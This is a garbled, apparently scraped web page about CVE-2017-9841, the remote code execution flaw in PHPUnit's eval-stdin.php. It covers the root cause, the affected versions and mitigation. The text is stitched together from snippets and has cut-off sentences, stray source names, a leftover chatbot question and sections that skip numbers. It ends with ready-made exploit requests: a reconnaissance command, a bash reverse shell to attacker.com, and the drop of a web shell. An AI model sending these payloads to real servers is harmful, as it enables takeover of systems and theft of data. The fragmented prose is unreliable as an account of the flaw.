Vendor Phpunit Phpunit Src — Util Php Eval-stdin.php Cve |link|
The string you provided refers to CVE-2017-9841 , a critical Remote Code Execution (RCE) vulnerability in the PHPUnit testing framework. CVE Details Vulnerability Overview The flaw exists because the script located at vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php (and sometimes Util/PHP/eval-stdin.php ) executes arbitrary PHP code received via the php://input wrapper without any authentication. Miggo Security Vulnerability Type: Remote Code Execution (RCE) / Code Injection. CVSS Score: 9.8 (Critical). Vulnerable Versions: PHPUnit before 4.8.28. PHPUnit 5.x before 5.6.3. CVE Details How Exploitation Works Attackers exploit this when the
folder of a web application is publicly accessible from the internet. They can send a malicious request to the file with a body beginning with , followed by commands like system("id"); phpinfo(); CVE Details
This vulnerability is frequently targeted by automated scanners and malware like Androxgh0st , which uses it to exfiltrate sensitive environment files ( Mitigation and Fixes Update PHPUnit: Ensure you are using version
, or any newer version (like 6.x+). The patch changed the input source to php://stdin , which cannot be populated via web-based HTTP requests. Restrict Access: Block external access to the folder using your web server configuration (e.g., for Apache or blocks for Nginx). Cleanup Production:
PHPUnit should strictly be a development dependency and should not be uploaded to production servers. Miggo Security Are you checking a server log for this path, or are you looking for a remediation guide for a specific application? Vulnerability Details : CVE-2017-9841
CVE-2017-9841 : Util/PHP/eval-stdin. php in PHPUnit before 4.8. 28 and 5. x before 5.6. 3 allows rem. Vulnerability Details : CVE- CVE Details Vulnerability Details : CVE-2017-9841
The path vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php refers to a critical Remote Code Execution (RCE) vulnerability tracked as CVE-2017-9841. This flaw allows an unauthenticated attacker to execute arbitrary PHP code on a server. Vulnerability Summary
Root Cause: The file eval-stdin.php used the eval() function to process raw POST data via the php://input wrapper.
Exploitation: An attacker can send a crafted HTTP POST request containing PHP code starting with directly to the file's URI. vendor phpunit phpunit src util php eval-stdin.php cve
Impact: Full system compromise, including the ability to steal sensitive credentials (like .env files), install malware, or access databases.
Affected Versions: PHPUnit versions before 4.8.28 and all 5.x versions before 5.6.3. Why This Happens
This vulnerability typically manifests in production environments when development tools are incorrectly exposed to the internet. Common causes include: CVE-2017-9841 Detail - NVD
2. Technical Analysis of the Flaw
To understand why this vulnerability exists, we must look at the code within eval-stdin.php.
The Vulnerable Code:
In affected versions, the file contains logic designed to read from standard input (STDIN) and evaluate the PHP code received. The simplified logic looked roughly like this:
<?php
// eval-stdin.php
eval('?>' . file_get_contents('php://input'));
?>
The Mechanism:
- Input Source: The function
file_get_contents('php://input') reads the raw body of an HTTP POST request.
- Execution: The
eval() function takes that raw input and executes it as PHP code.
- The Security Gap: Ideally, this script is meant to be run via the Command Line Interface (CLI) to assist with testing isolation. However, the script itself did not contain a check to ensure it was running in a CLI environment. If a web server (like Apache or Nginx) served this file, it would treat an incoming HTTP request as valid input to be executed.
6. Fixes and Patches
The PHPUnit team released patches in:
- PHPUnit 4.8.28 – removed the
eval-stdin.php file.
- PHPUnit 5.6.3 – same.
The fix was simply deleting the file. No additional security wrapper was added because the file was never meant for production use. The string you provided refers to CVE-2017-9841 ,
Mitigation and Prevention
To mitigate such vulnerabilities:
-
Update PHPUnit: Ensure you're using a version of PHPUnit that has the security patch applied. Most vendors and maintainers of PHPUnit will release updates once a vulnerability is disclosed.
-
Code Review: Regularly review code, especially utility scripts like eval-stdin.php, to ensure they are not exposing your application to unnecessary risks.
-
Input Validation and Sanitization: Always validate and sanitize inputs to prevent arbitrary code execution vulnerabilities.
-
Disable Unnecessary Features: If your project does not require certain features of PHPUnit or other utilities that could introduce risks, disable or remove them.
Example Payloads
1. System Information (Reconnaissance)
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: victim.com
Content-Type: application/x-www-form-urlencoded
<?php system('id'); ?>
2. Reverse Shell
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: victim.com
<?php exec('/bin/bash -c "bash -i >& /dev/tcp/attacker.com/4444 0>&1"'); ?>
3. Web Shell Upload
POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
<?php file_put_contents('shell.php', '<?php system($_GET["cmd"]); ?>'); ?>
Attackers often chain this with file inclusion, SQL injection, or LFI vulnerabilities—or simply use eval-stdin.php as their initial foothold.